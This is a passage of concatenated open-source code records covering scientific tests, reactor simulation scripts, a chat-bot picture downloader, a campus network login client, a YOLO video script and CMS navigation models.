\n    codebook_array = [\n        {\n            Features.CODEWORD: [\n                {Axes.ROUND.value: 0, Axes.CH.value: 1, Features.CODE_VALUE: 1},\n                {Axes.ROUND.value: 1, Axes.CH.value: 0, Features.CODE_VALUE: 1}\n            ],\n            Features.TARGET: 'GENE_A'\n        },\n        {\n            Features.CODEWORD: [\n                {Axes.ROUND.value: 1, Axes.CH.value: 0, Features.CODE_VALUE: 1},\n                {Axes.ROUND.value: 1, Axes.CH.value: 1, Features.CODE_VALUE: 1}\n            ],\n            Features.TARGET: 'GENE_B'\n        },\n    ]\n    return Codebook.from_code_array(codebook_array)\n\n\ndef test_metric_decode():\n    \"\"\"\n    This test exposes 3 test features, each with the same normalized trace.\n    The first should decode to GENE_A, and pass both the intensity and distance filters.\n    The second should decode to GENE_B, but fail the intensity filter.\n    The third should decode to GENE_B, since it is closer to that gene than to GENE_A, but\n    should nevertheless fail the distance filter because the tiles other than (0, 0) don't\n    match.\n    \"\"\"\n    data = np.array(\n        [[[0, 4],  # this code is decoded \"right\"\n          [3, 0]],\n         [[0, 0],  # this code should be filtered based on magnitude\n          [0.4, 0.3]],\n         [[30, 0],  # this code should be filtered based on distance\n          [0, 40]]]\n    )\n    intensities = intensity_table_factory(data)\n    codebook = codebook_factory()\n\n    decoded_intensities = codebook.decode_metric(\n        intensities,\n        max_distance=0.5,\n        min_intensity=1,\n        norm_order=1\n    )\n\n    assert hasattr(decoded_intensities, Features.DISTANCE)\n\n    assert decoded_intensities.sizes[Features.AXIS] == 3\n\n    assert np.array_equal(\n        decoded_intensities[Features.TARGET].values,\n        ['GENE_A', 'GENE_B', 'GENE_B'],\n    )\n\n    assert np.array_equal(\n        decoded_intensities[Features.PASSES_THRESHOLDS].values,\n        [True, False, False]\n    )\n\n    assert not np.all(decoded_intensities == intensities)\n\n\ndef test_unmatched_intensities_and_codebook_table_sizes_throws_value_error():\n    \"\"\"\n    Codebook and Intensity channel and round number must match. 
Here we use a codebook with 3\n channels, but an IntensityTable with only 2 to verify an error is thrown.\n \"\"\"\n\n # this codebook has 3 channels\n codebook_array = [\n {\n Features.CODEWORD: [\n {Axes.ROUND.value: 0, Axes.CH.value: 2, Features.CODE_VALUE: 1},\n {Axes.ROUND.value: 1, Axes.CH.value: 0, Features.CODE_VALUE: 1}\n ],\n Features.TARGET: 'GENE_A'\n },\n ]\n codebook = Codebook.from_code_array(codebook_array)\n intensities = intensity_table_factory()\n with pytest.raises(ValueError):\n codebook.decode_metric(intensities, max_distance=0.5, min_intensity=1, norm_order=1)\n","repo_name":"spacetx/starfish","sub_path":"starfish/core/codebook/test/test_metric_decode.py","file_name":"test_metric_decode.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","stars":220,"dataset":"github-code","pt":"37"} +{"seq_id":"27994637301","text":"from collections import defaultdict\nfrom decimal import Decimal\n\nfrom lib.helpers import to_decimal\n\n\ndef format_scorechain_response(signals_data, score_percent_key='percent'):\n \"\"\"\n Translate ScoreChain relations into signals\n\n \"relationships\": [\n {\n \"type\": \"exchange\",\n \"label\": \"string\",\n \"address\": \"string\",\n \"value\": 0.42,\n \"percent\": 13,\n \"scx\": 37\n },\n {\n \"type\": \"Miners\",\n \"label\": \"string\",\n \"address\": \"string\",\n \"value\": 0.42,\n \"percent\": 24,\n \"scx\": 37\n },\n ]\n\n [ exchange, MIXING, Miners, Neutral, OFAC Sanction list,\n ToBig, cloudmining, darkweb, gambling, miners, mixing,\n scammer, service ]\n \"\"\"\n default_signals = {\n 'dark_market': 0,\n 'dark_service': 0,\n 'exchange': 0,\n 'trusted_exchange': 0,\n 'gambling': 0,\n 'illegal_service': 0,\n 'marketplace': 0,\n 'miner': 0,\n 'mixer': 0,\n 'payment': 0,\n 'ransom': 0,\n 'scam': 0,\n 'stolen_coins': 0,\n 'wallet': 0,\n 'service': 0,\n 'neutral': 0,\n 'sanction': 0,\n 'unknown': 0,\n }\n default_data = defaultdict(Decimal)\n\n for relationship in signals_data:\n value = to_decimal(relationship[score_percent_key]) / 100\n key = get_signal_type_from_response(relationship['type'])\n default_data[key] += value\n\n result = dict(default_signals)\n result.update(default_data)\n result = {k: str(val) for k, val in result.items()}\n return result\n\n\ndef get_signal_type_from_response(rel_type: str):\n rel_type = rel_type.lower()\n # map types\n if rel_type == 'darkweb':\n key = 'dark_market'\n elif rel_type == 'dex':\n key = 'dex'\n elif rel_type == 'exchange':\n key = 'trusted_exchange'\n elif rel_type == 'gambling':\n key = 'gambling'\n elif rel_type in ('miners', 'cloudmining'):\n key = 'miner'\n elif rel_type in ('mixing', 'mixing service',):\n key = 'mixer'\n elif rel_type == 'scammer':\n key = 'scam'\n elif rel_type == 'service':\n key = 'service'\n elif rel_type == 'neutral':\n key = 'neutral'\n elif rel_type == 'ofac sanction list':\n key = 'sanction'\n else:\n key = 'unknown'\n return key\n","repo_name":"Polygant/OpenCEX-backend","sub_path":"cryptocoins/scoring/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"7953583061","text":"import os\n\nimport requests\n\nfrom core.exceptions import PictureNotFoundException, TagsNotFoundException, EcchiDeniedException, \\\n HentaiDeniedException, DownloadErrorException\nfrom core.utils import logger\nfrom core.utils.json_handler import json_handler\nfrom .konachan_grabber import KonachanGrabber as 
KonaGrabber\nfrom .yandere_grabber import YandereGrabber as YandeGrabber\n\n\nclass PictureGrabber(object):\n \"\"\"\n Unified grabber for konachan and yandere\n \"\"\"\n\n _kon = None\n _ya = None\n\n @logger.class_construct\n def __init__(self):\n self._kon = KonaGrabber()\n self._ya = YandeGrabber()\n\n @logger.log_func\n def get_picture(self, tags, rating, from_user):\n \"\"\"\n Get picture\n\n :param tags: picture tags\n :param rating: picture rating\n :param from_user: type of chat message from\n :raise: PictureNotFoundException if picture not found\n :raise: TagsNotFoundException if request picture without tags\n :raise: EcchiDeniedException if request ecchi in non private chat\n :raise: HentaiDeniedException if request hentai on non private chat\n :rtype: None\n \"\"\"\n\n logger.info(\"PictureGrabber get_picture()\")\n\n if (not from_user) and rating != \"safe\":\n if rating == \"questionable\":\n logger.info(\"Request ecchi in non private chat. Denied. Current rating: '\" + str(rating) + \"'\")\n raise EcchiDeniedException\n else:\n logger.info(\"Request hentai on non private chat. Denied. Current rating: '\" + str(rating) + \"'\")\n raise HentaiDeniedException\n\n logger.debug(\"Join tags list by '+'\")\n if isinstance(tags, list):\n if len(tags) != 0:\n tags = '+'.join(tags)\n logger.info(\"Tags in request: '\" + str(tags) + \"'\")\n else:\n logger.info(\"Not found tags in request. Raise TagsNotFoundException\")\n raise TagsNotFoundException\n\n url, picture_hash = self._kon.get_picture(tags, rating)\n logger.debug(\"Get url '\" + str(url) + \"' and hash '\" + str(picture_hash) + \"'\")\n\n if picture_hash != \"\":\n logger.info(\"Found picture in Konachan. Returning\")\n\n self._download_picture(url)\n\n else:\n logger.info(\"Not found picture in Konachan. Continue\")\n\n url, picture_hash = self._ya.get_picture(tags, rating)\n logger.debug(\"Get url '\" + str(url) + \"' and hash '\" + str(picture_hash) + \"'\")\n\n if picture_hash != \"\":\n logger.info(\"Found picture in Yandere. Returning\")\n\n self._download_picture(url)\n else:\n logger.info(\"Not found picture in Yandere. 
Raise PictureNotFoundException\")\n                raise PictureNotFoundException()\n\n    @logger.log_func\n    def _download_picture(self, url):\n        \"\"\"\n        Download picture as file from url\n\n        :param url: url for downloading\n        :raise: DownloadErrorException if an error occurs while downloading\n        :rtype: None\n        \"\"\"\n        try:\n            raw_picture = requests.get(url)\n            picture = open(\"pictures\" + os.path.sep + json_handler.constants['default_picture_file'], 'wb')\n            for chunk in raw_picture.iter_content(chunk_size=512 * 1024):\n                if chunk:\n                    picture.write(chunk)\n            picture.close()\n\n        except Exception as e:\n            logger.debug(\"Download failed with exception: \" + str(e))\n            raise DownloadErrorException()\n","repo_name":"AnyKeyShik/Bismarck","sub_path":"core/utils/pictures/picture_grabber.py","file_name":"picture_grabber.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"72796707626","text":"import re\nimport json\nimport requests as req\nimport urllib\nimport urllib.request\nfrom urllib.parse import urlparse, parse_qs\nimport urllib.parse\n\n# wrapper around a POST request\ndef post(url, headers={}, data={}):\n    data = bytes(urllib.parse.urlencode(data), encoding=\"utf-8\")\n    request = urllib.request.Request(url, headers=headers, data=data)\n    response = urllib.request.urlopen(request)\n    return response\n\n\n# wrapper around a GET request\ndef get(url, headers={}):\n    request = urllib.request.Request(url, headers=headers)\n    response = urllib.request.urlopen(request)\n\n    return response\n\n\nclass Netlogin:\n    def __init__(self, args):\n        \"\"\"\n        Login services:\n        0: campus network\n        1: China Mobile\n        2: China Unicom\n        3: China Telecom\n        \"\"\"\n        self.services = {\n            \"0\": \"%e6%a0%a1%e5%9b%ad%e7%bd%91\",\n            \"1\": \"%E4%B8%AD%E5%9B%BD%E7%A7%BB%E5%8A%A8\",\n            \"2\": \"%e4%b8%ad%e5%9b%bd%e8%81%94%e9%80%9a\",\n            \"3\": \"%e4%b8%ad%e5%9b%bd%e7%94%b5%e4%bf%a1\",\n        }\n        self.url = \"http://auth.ysu.edu.cn/eportal/InterFace.do?method=\"\n        self.header = {\n            \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\",\n            \"Accept-Encoding\": \"identity\",\n        }\n        self.isLogined = None\n        self.alldata = None\n        self.args = args\n\n    def tst_net(self):\n        \"\"\"\n        Check whether the network is already authenticated\n        :return: whether we are authenticated\n        \"\"\"\n        res = req.get(\"http://auth.ysu.edu.cn\", headers=self.header)\n\n        if res.url.find(\"success.jsp\") > 0:\n            cont = urlparse(res.url)\n            params = parse_qs(cont.query)\n            userIndex = params[\"userIndex\"]\n            # print(userIndex)\n            userres = req.post(\n                \"http://auth.ysu.edu.cn/eportal/InterFace.do?method=getOnlineUserInfo\",\n                data={\"userIndex\": userIndex},\n            )\n            userres.encoding = \"u8\"\n            userinfo = userres.json()\n            self.isLogined = True\n            return {\n                \"user\": userinfo[\"userName\"],\n                \"isp\": userinfo[\"service\"],\n                \"ip\": userinfo[\"userIp\"],\n            }, True\n        else:\n            self.isLogined = False\n            return None, self.isLogined\n\n    def isCode(self):\n        \"\"\"\n        Check whether a captcha has to be entered\n        Not implemented yet\n        :return: whether a captcha is needed\n        \"\"\"\n        pass\n\n        return False\n\n    def login(self, user, pwd, type, code=\"\"):\n        \"\"\"\n        Log in to the campus network with the given parameters; automatically checks whether the current network is already authenticated.\n        :param user: login id\n        :param pwd: login password\n        :param type: authentication service\n        :param code: captcha code\n        :return: tuple - first item: authentication status; second item: details\n        \"\"\"\n        if self.isLogined is None:\n            self.tst_net()\n        if self.isLogined is False:\n            if user == \"\" or pwd == \"\":\n                return (False, \"用户名或密码为空\")\n            self.data = {\n                \"userId\": user,\n                \"password\": pwd,\n                \"service\": self.services[str(type)],\n                \"operatorPwd\": \"\",\n                \"operatorUserId\": \"\",\n                \"validcode\": code,\n                \"passwordEncrypt\": \"False\",\n            }\n            res = get(\"http://auth.ysu.edu.cn\", headers=self.header)
get(\"http://auth.ysu.edu.cn\", headers=self.header)\n queryString = re.findall(\n r\"href='.*?\\?(.*?)'\", res.read().decode(\"utf-8\"), re.S\n )\n self.data[\"queryString\"] = queryString[0]\n\n res = post(self.url + \"login\", headers=self.header, data=self.data)\n login_json = json.loads(res.read().decode(\"utf-8\"))\n self.userindex = login_json[\"userIndex\"]\n # self.info = login_json\n self.info = login_json[\"message\"]\n if login_json[\"result\"] == \"success\":\n return (True, \"认证成功\")\n else:\n return (False, self.info)\n\n return (True, \"已经在线\")\n\n def get_alldata(self):\n \"\"\"\n 获取当前认证账号全部信息\n #!!!注意!!!#此操作会获得账号alldata['userId']姓名alldata['userName']以及密码alldata['password']\n :return:全部数据的字典格式\n \"\"\"\n res = get(\n \"http://auth.ysu.edu.cn/eportal/InterFace.do?method=getOnlineUserInfo\",\n headers=self.header,\n )\n try:\n self.alldata = json.loads(res.read().decode(\"utf-8\"))\n except json.decoder.JSONDecodeError as e:\n print(\"数据解析失败,请稍后重试。\")\n\n return self.alldata\n\n def logout(self):\n \"\"\"\n 登出,操作内会自动获取特征码\n :return:元祖第一项:是否操作成功;第二项:详细信息\n \"\"\"\n if self.alldata == None:\n self.get_alldata()\n\n res = get(self.url + \"logout\", headers=self.header)\n logout_json = json.loads(res.read().decode(\"utf-8\"))\n # self.info = logout_json\n self.info = logout_json[\"message\"]\n\n if logout_json[\"result\"] == \"success\":\n return (True, \"下线成功\")\n else:\n return (False, self.info)\n\n","repo_name":"angshn/tools","sub_path":"auth/netlogin.py","file_name":"netlogin.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"36260759821","text":"#!/usr/bin/env python\n#\n# This script will check thermal reactivity coefficients of both\n# the fuel and the graphite. TMP method for doppler broadening is\n# used by default.\n#\n# PyNE, *is* needed, although the crazy installation stuff isn't needed.\n# we just import what we need directly in order to follow the DRY philosophy.\n# just make sure this line is in your bashrc:\n# export PYTHONPATH=$HOME//pyne/pyne:${PYTHONPATH}\n#\n# after doing this, since we don't care about the rest of the PyNE stuff\n# and don't want to deal with potentially painful installation, comment out\n# any line containing \"QAWarning\".\n\nimport copy\nfrom scipy.optimize import curve_fit\nimport time\nimport os\nimport sys\nimport pickle as pk\nimport re\nimport RefuelCore\nimport shutil\nimport serpent\nimport progressbar\n\ndef getKeffSigma(filename):\n \"\"\" Gets keff and sigma from the serpent input file. 
\"\"\"\n res = serpent.parse_res(filename)\n\n # return ABS_KEFF since it usually seems to have the lower\n # uncertainty\n keff, sigma = res['ABS_KEFF'][0]\n\n # sigma DEFINITELY is not fractional.\n return keff, sigma\n\n\ndef getDoppGeomVoidIsFeedback(name):\n \"\"\" returns a length 4 tuple of booleans.\n The first through fourth are respectively\n whether the filename has a name matching how\n submitJob names feedback experiments, whether the\n filename has doppler, whether it has geometry expansion,\n and whether it has salt voiding.\"\"\"\n\n # regex for feedback files\n pattern = re.compile(\"^Day[0-9]*Temp[0-9]*.*\")\n doppRe = re.compile(\".*Dopp.*\")\n geomRe = re.compile(\".*Geom.*\")\n voidRe = re.compile(\".*Void.*\")\n\n return tuple(map(bool, [pattern.match(name), doppRe.match(name),\n geomRe.match(name), voidRe.match(name)]))\n\n\ndef collectResults(outFileName, sep=\" \", header=True):\n \"\"\" Collects feedback results in a text file from feedback numeric\n experiments. The file includes a header by default to describe\n columns. The default columns separator is whitespace. \n\n All results including doppler, geometry, and voiding get put\n in the file. Some boolean-valued colulmns describe if the \n feedback mechanism is present. eg a column for voiding has a 0\n if not voided, 1 otherwise.\n\n Args :\n None\n Kwargs :\n sep - string. separator of fields in each row.\n header - bool. whether to include a comment line\n at the top of the output file.\n\n \"\"\"\n # regex for finding numbers\n numberPattern = re.compile(\"Temp[0-9]*\")\n dayPattern = re.compile(\"Day[0-9]*\")\n\n outFileHandle = open(outFileName, 'w')\n\n ls = os.listdir('.')\n\n # make a progress bar\n bar = progressbar.ProgressBar(redirect_stdout=True, max_value=len(ls))\n i = 0\n\n # write a header if desired\n if header:\n outFileHandle.write(\"# day, rho, rhosigma, temp, hasDoppler, hasGeomExpand,\"\n \"hasSaltVoiding\\n\")\n for filename in ls:\n \n # check if this is a directory matching the name\n # of a feedback results file.\n isfeedback, isdopp, isgeom, isvoid = getDoppGeomVoidIsFeedback(filename)\n if not isfeedback:\n # not what we're looking for then\n continue\n\n # ok, this is one we're interested in\n os.chdir(filename)\n\n ## grab implicit keff estimate and its uncertainty\n doppstr = 'Dopp' if isdopp else ''\n geomstr = 'Geom' if isgeom else ''\n voidstr = 'Void' if isvoid else ''\n templist = [patt for patt in numberPattern.findall(filename) if patt != '']\n if len(templist) != 1:\n raise Exception(\n \"More than one or 0 temperature found in {}\".format(filename))\n temperature = float(templist[0][4:])\n daylist = [patt for patt in dayPattern.findall(filename) if patt != '']\n if len(daylist) != 1:\n raise Exception(\n \"More than one or 0 day found in {}\".format(filename))\n day = float(daylist[0][3:])\n\n # deduce filename\n outfilename = ('basicDMSR' + str(int(temperature)) + doppstr + geomstr +\n voidstr + '_res.m')\n try:\n keff, sigma = getKeffSigma(outfilename)\n except IOError:\n print(\"It appears that {} isn't done. 
Continuing anyways.\".format(\n filename))\n os.chdir('..')\n i += 1\n bar.update(i)\n continue\n rho = (keff - 1.0) / keff\n drho = sigma / keff**2 # rho uncertainty\n\n data = [day, rho, drho, temperature, int(isdopp), int(isgeom), int(isvoid)]\n data = map(str, data)\n outFileHandle.write( sep.join(data) + \"\\n\")\n\n # progress!\n i += 1\n bar.update(i)\n\n os.chdir('..')\n\n outFileHandle.close()\n\ndef submitJob(day, inputfileslog, \n doppler=False,\n geometry=False,\n voiding=False,\n overwrite=False,\n queue='gen5', ppn=8, verb=False, nnodes=1):\n \"\"\"Submits jobs that checks feedback coefficient at\n a specified day under an arbitrary combination of feedback\n mechanisms. Doppler, salt expansion, and graphite expansion\n are considered separately.\n\n A directory is made of the form\n\n Args :\n day - day of the depletion simulation to test feedback at.\n must be present in the inputfileslog directory.\n inputfileslog - directory containing SerpentInputFile pickle\n file from the depletion simulation\n\n Kwargs:\n doppler, geometry, voiding - set to True if desired\n the rest are self-explanatory\n \"\"\"\n\n with open(os.path.join(inputfileslog,\"inputday{}.dat\".format(day)), 'rb') as fh:\n inputfile = pk.load(fh)\n\n # temperatures to try, in K\n # this is a linearization, really, so a point on either side\n # of the nominal should work well\n testT=[850.0, 950.0]\n\n # parameters for the analysis\n tmp_or_tms='tmp'\n perlcase=3 #case param for perl script. this one assumes graphite\n # to be 50 K above the salt temperature\n\n # string that describes which changes to neutronics domain are made\n descripString = ''\n if doppler:\n descripString += 'Dopp'\n if geometry:\n descripString += 'Geom'\n if voiding:\n descripString += 'Void'\n if descripString == '':\n descripString = 'BaseCase'\n\n # copy core data for core writer\n coresize=inputfile.core_size\n coresalt=inputfile.salt_type #doesn't actually matter\n sf=inputfile.salt_fraction\n p=inputfile.pitch\n name = inputfile.inputfilename\n\n # make a temporary input file just to obtain temperature-adjusted geometry:\n # this only needs to be done once: future trial cases can include these geometry\n # files\n for thisTemp in testT:\n tempInput = RefuelCore.SerpentInputFile(core_size=coresize,\n salt_type=coresalt,\n case=1,\n salt_fraction=sf,\n pitch=p,\n initial_enrichment=0.01, #doesnt matter\n num_nodes=999,\n PPN=1234,\n queue='herring' )\n tempInput.SetInputFileName('tempAdjustGeom{}K'.format(thisTemp))\n tempInput.WriteJob()\n # now rename the resulting geometry file:\n shutil.move('MSRs2_geom.inp', 'MSRs2_geom{}K.inp'.format(thisTemp))\n os.remove(\"tempAdjustGeom{}K.sh\".format(thisTemp))\n os.remove(\"MSRs2.inp\")\n os.remove(\"corewriterparams.txt\")\n\n\n #construct new inputfiles\n inplist=range(len(testT)) # just a list with correct length\n # later will have inp file objs\n\n # each new input file must get a copy of the right fuel isotopics.\n fuelmat=None\n for mat in inputfile.materials:\n if mat.materialname =='fuel':\n fuelmat=mat #save reference to fuelmat\n break\n if fuelmat==None:\n raise Exception(\"fuel material not found in inputfile\")\n\n for i,T in enumerate(testT):\n dirname='Day'+str(day)+\"Temp\"+str(int(T)) + descripString\n if dirname in os.listdir('.'):\n if overwrite:\n os.system('rm -r {}'.format(dirname))\n else:\n print(\"Found a directory called {}. 
not overwriting.\".format(\n dirname))\n raise Exception(\"Will not overwrite stuff without overwrite=True\")\n os.mkdir(dirname)\n os.chdir(dirname)\n inplist[i]=RefuelCore.SerpentInputFile(core_size=coresize,salt_type=coresalt,\n case=perlcase,salt_fraction=sf,\n initial_enrichment=0.01,num_nodes=nnodes,\n pitch=p,tempK=900.0,queue=queue, PPN=ppn)\n # change inputfile name\n inplist[i].SetInputFileName(name + str(int(testT[i])) + descripString)\n\n # need great MC resolution for this calculation\n inplist[i].ChangeKcodeSettings(int(5e4), 300, 40)\n\n #set directory\n inplist[i].directory=dirname\n\n # copy isotopics from requested core\n for j,mat in enumerate(inplist[i].materials):\n if mat.materialname=='fuel':\n # change material composition\n delindex=j\n break\n del inplist[i].materials[delindex]\n inplist[i].materials.append(copy.copy(fuelmat))\n # and now the fuel must have the correct test temperature\n\n # Write the jobs, making temperature changes ONLY after write \n # to ensure that ONLY changes we want are made (doppler, void, geom)\n\n if doppler:\n inplist[i].getMat(\"fuel\").SetTemp(testT[i])\n\n # adjust which geometry file is used as appropriate\n if geometry:\n inplist[i].includefiles.remove('MSRs2_geom.inp')\n inplist[i].includefiles.append('../MSRs2_geom{}K.inp'.format(testT[i]))\n mod = inplist[i].getMat('mod')\n mod.tempK = T + 50.0\n grCTE = 3.5e-6\n mod.massdensity /= (1.0+grCTE*(T-900.0))**3\n\n if voiding:\n fuel = inplist[i].getMat(\"fuel\")\n mdens = fuel.getMassDens()\n mdens -= (testT[i]-900.0) * .003967 # from ya boy Nam\n fuel.atomdensity = None\n fuel.massdensity = mdens\n fuel.converToAtomDens()\n\n inplist[i].WriteJob()\n inplist[i].SubmitJob()\n\n os.chdir('..')\n","repo_name":"ondrejch/salt-management-DMSR","sub_path":"src/stabilitycheck.py","file_name":"stabilitycheck.py","file_ext":"py","file_size_in_byte":10744,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"25359553491","text":"from linear_system import LinearSystem\r\nfrom matrix_generators import diag, terdiag, hilbert, rand, identity\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndef iterative_testing(linear_system, eps_list):\r\n for eps in eps_list:\r\n solve, count = linear_system.iterative_solve(10 ** (-eps))\r\n\r\n print(f'\\nМетод простой итерации (eps = 10^(-{eps})):')\r\n # Найденное решение\r\n #print(pd.DataFrame(solve))\r\n print(f'Количество итераций: {count}')\r\n\r\n print('\\n----------------------------------------------------------------------')\r\n\r\ndef seidel_testing(linear_system, eps_list):\r\n for eps in eps_list:\r\n solve, count = linear_system.seidel_solve(10 ** (-eps))\r\n\r\n print(f'\\nМетода Зейделя (eps = 10^(-{eps})):')\r\n # Найденное решение\r\n #print(pd.DataFrame(solve))\r\n print(f'Количество итераций: {count}')\r\n\r\n print('\\n----------------------------------------------------------------------')\r\n\r\n\r\n# ТЕСТЫ\r\nif __name__=='__main__':\r\n print('\\n\\t\\tЗадание 4. 
Итерационные методы решения СЛАУ\\n')\r\n \r\n # Простая итерация\r\n print('\\n\\n\\t------------ Метод простой итерации ------------\\n')\r\n\r\n # Трёхдиагональная (плохая) матрица\r\n for dim in [20, 40, 60]:\r\n print(f'\\n\\tТрёхдиагональная (плохая) матрица (порядка {dim})')\r\n ls = LinearSystem(terdiag(dim))\r\n iterative_testing(ls, [2, 4, 6, 8])\r\n\r\n # Матрица 1 из методички\r\n print(f'\\n\\tМатрица 1 из методички А.Н.Пакулиной (порядка 2)')\r\n ls = LinearSystem([\r\n [-401.98, 200.34], \r\n [1202.04, -602.32]\r\n ])\r\n iterative_testing(ls, [2, 4, 6, 8]) \r\n\r\n # Матрица 2 из методички\r\n print(f'\\n\\tМатрица 2 из методички А.Н.Пакулиной (порядка 2)')\r\n ls = LinearSystem([\r\n [-402.90, 200.70],\r\n [1204.20, -603.60]\r\n ])\r\n iterative_testing(ls, [2, 4, 6, 8])\r\n\r\n\r\n # Метод Зейделя\r\n print('\\n\\n\\t---------------- Метод Зейделя ----------------\\n')\r\n\r\n # Трёхдиагональная (плохая) матрица\r\n print('\\n\\tТрёхдиагональная (плохая) матрица (порядка 10)')\r\n ls = LinearSystem(terdiag(20))\r\n seidel_testing(ls, [2, 4, 6, 8])\r\n\r\n # Матрица 1 из методички\r\n print(f'\\n\\tМатрица 1 из методички А.Н.Пакулиной (порядка 2)')\r\n ls = LinearSystem([\r\n [-401.98, 200.34], \r\n [1202.04, -602.32]\r\n ])\r\n seidel_testing(ls, [2, 4, 6, 8]) \r\n\r\n # Матрицы Гильберта порядка 40, 60 и 100:\r\n #for dim in [20, 40, 60]:\r\n # print(f'\\n\\tМатрица Гильберта (порядка {dim})')\r\n # ls = LinearSystem(hilbert(dim))\r\n # seidel_testing(ls, [2, 4, 5])\r\n\r\n # Большая трёхдиагональная (плохая) матрица\r\n print('\\n\\tТрёхдиагональная (плохая) матрица (порядка 300)')\r\n ls = LinearSystem(terdiag(300))\r\n iterative_testing(ls, [2, 3, 4, 5, 6])","repo_name":"lyaplyap/computational_practicum_6semester","sub_path":"iterative_solution/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16715359702","text":"import cv2\nfrom object_detection import *\nfrom utils.plots import plot_one_box\nimport numpy as np\n\nod = ObjectDetection(\"yolov7.pt\")\ncap = cv2.VideoCapture(\"tamalanrea.mp4\")\n\nfps = cap.get(cv2.CAP_PROP_FPS)\nw = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nh = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\nvid_writer = cv2.VideoWriter(\n 'output.mp4', cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))\n\nwhile True:\n # Load Image\n _, img = cap.read()\n\n predict, names, colors = od.detect(img)\n for *xyxy, conf, cls in reversed(predict):\n label = f'{names[int(cls)]} {conf:.2f}'\n plot_one_box(xyxy, img, label=label,\n color=colors[int(cls)], line_thickness=1)\n # Show Image\n # im0 = img.copy()\n # im0 = cv2.resize(img, None, fx=0.5, fy=0.5)\n # cv2.imshow(\"Img\", im0)\n vid_writer.write(img)\n # key = cv2.waitKey(0)\n # if key == 27:\n # break\ncv2.destroyAllWindows()\n","repo_name":"asrulsaid/yolo-object-detection","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6259310865","text":"\nfrom leonardo.module.web.models import Widget\nfrom leonardo.module.nav.mixins import NavigationWidgetMixin\nfrom feincms.module.page.extensions.navigation import (NavigationExtension,\n PagePretender)\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass NavigationWidget(Widget, NavigationWidgetMixin):\n\n \"\"\"Base class for navigation widgets\n \"\"\"\n\n class Meta:\n abstract 
= True\n\n\nclass FlatPageContentNavigationExtension(NavigationExtension):\n name = _('Flat page content navigation')\n\n def children(self, page, **kwargs):\n base_url = page.get_absolute_url()\n widget_list = page.objects.filter(parent=None)\n for widget in widget_list:\n subchildren = []\n for subwidget in widget.media_folder_children.all():\n subchildren.append(PagePretender(\n title=subwidget,\n url='%s%s/%s/' % (base_url, widget.name, subwidget.name),\n level=5\n ))\n yield PagePretender(\n title=widget,\n url='%s%s/' % (base_url, widget.name),\n children=subchildren,\n level=5\n )\n\n\nclass NestedPageContentNavigationExtension(NavigationExtension):\n name = _('Nested page content navigation')\n\n def children(self, page, **kwargs):\n base_url = page.get_absolute_url()\n widget_list = page.objects.filter(parent=None)\n for widget in widget_list:\n subchildren = []\n for subwidget in widget.media_folder_children.all():\n subchildren.append(PagePretender(\n title=subwidget,\n url='%s%s/%s/' % (base_url, widget.name, subwidget.name),\n level=5\n ))\n yield PagePretender(\n title=widget,\n url='%s%s/' % (base_url, widget.name),\n children=subchildren,\n level=5\n )\n\n# must be at last because widgets uses mixins\nfrom .widget.breadcrumbs.models import BreadcrumbsWidget\nfrom .widget.contentnavigation.models import ContentNavigationWidget\nfrom .widget.contextnavigation.models import ContextNavigationWidget\nfrom .widget.linearnavigation.models import LinearNavigationWidget\nfrom .widget.sitemap.models import SiteMapWidget\nfrom .widget.sitesearch.models import SiteSearchWidget\nfrom .widget.treenavigation.models import TreeNavigationWidget\nfrom .widget.languageselector.models import LanguageSelectorWidget\n","repo_name":"django-leonardo/django-leonardo","sub_path":"leonardo/module/nav/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"37"} +{"seq_id":"21345516656","text":"\"\"\"\nMethods to handle incoming service requests\n\"\"\"\n\nimport json\nimport datetime\nimport uuid\nimport pkg_resources\n\nimport flask\n\nfrom sqlalchemy import exc, or_\n\n\nfrom candig_dataset_service.orm.models import Dataset, ChangeLog\nfrom candig_dataset_service.orm import get_session, ORMException, dump\nfrom candig_dataset_service.api.logging import apilog, logger\nfrom candig_dataset_service.api.logging import structured_log as struct_log\nfrom candig_dataset_service.api.models import Version\nfrom candig_dataset_service.api.exceptions import IdentifierFormatError\nfrom candig_dataset_service.ontologies.duo import OntologyParser, OntologyValidator, ont\n\n\n\nAPP = flask.current_app\n\n\ndef _report_search_failed(typename, exception, **kwargs):\n \"\"\"\n Generate standard log message + request error for error:\n Internal error performing search\n :param typename: name of type involved\n :param exception: exception thrown by ORM\n :param **kwargs: arbitrary keyword parameters\n :return: Connexion Error() type to return\n \"\"\"\n report = typename + ' search failed'\n message = 'Internal error searching for '+typename+'s'\n logger().error(struct_log(action=report, exception=str(exception), **kwargs))\n return dict(message=message, code=500)\n\n\ndef _report_object_exists(typename, **kwargs):\n \"\"\"\n Generate standard log message + request error for warning:\n Trying to POST an object that already exists\n :param typename: name of type involved\n :param **kwargs: arbitrary keyword 
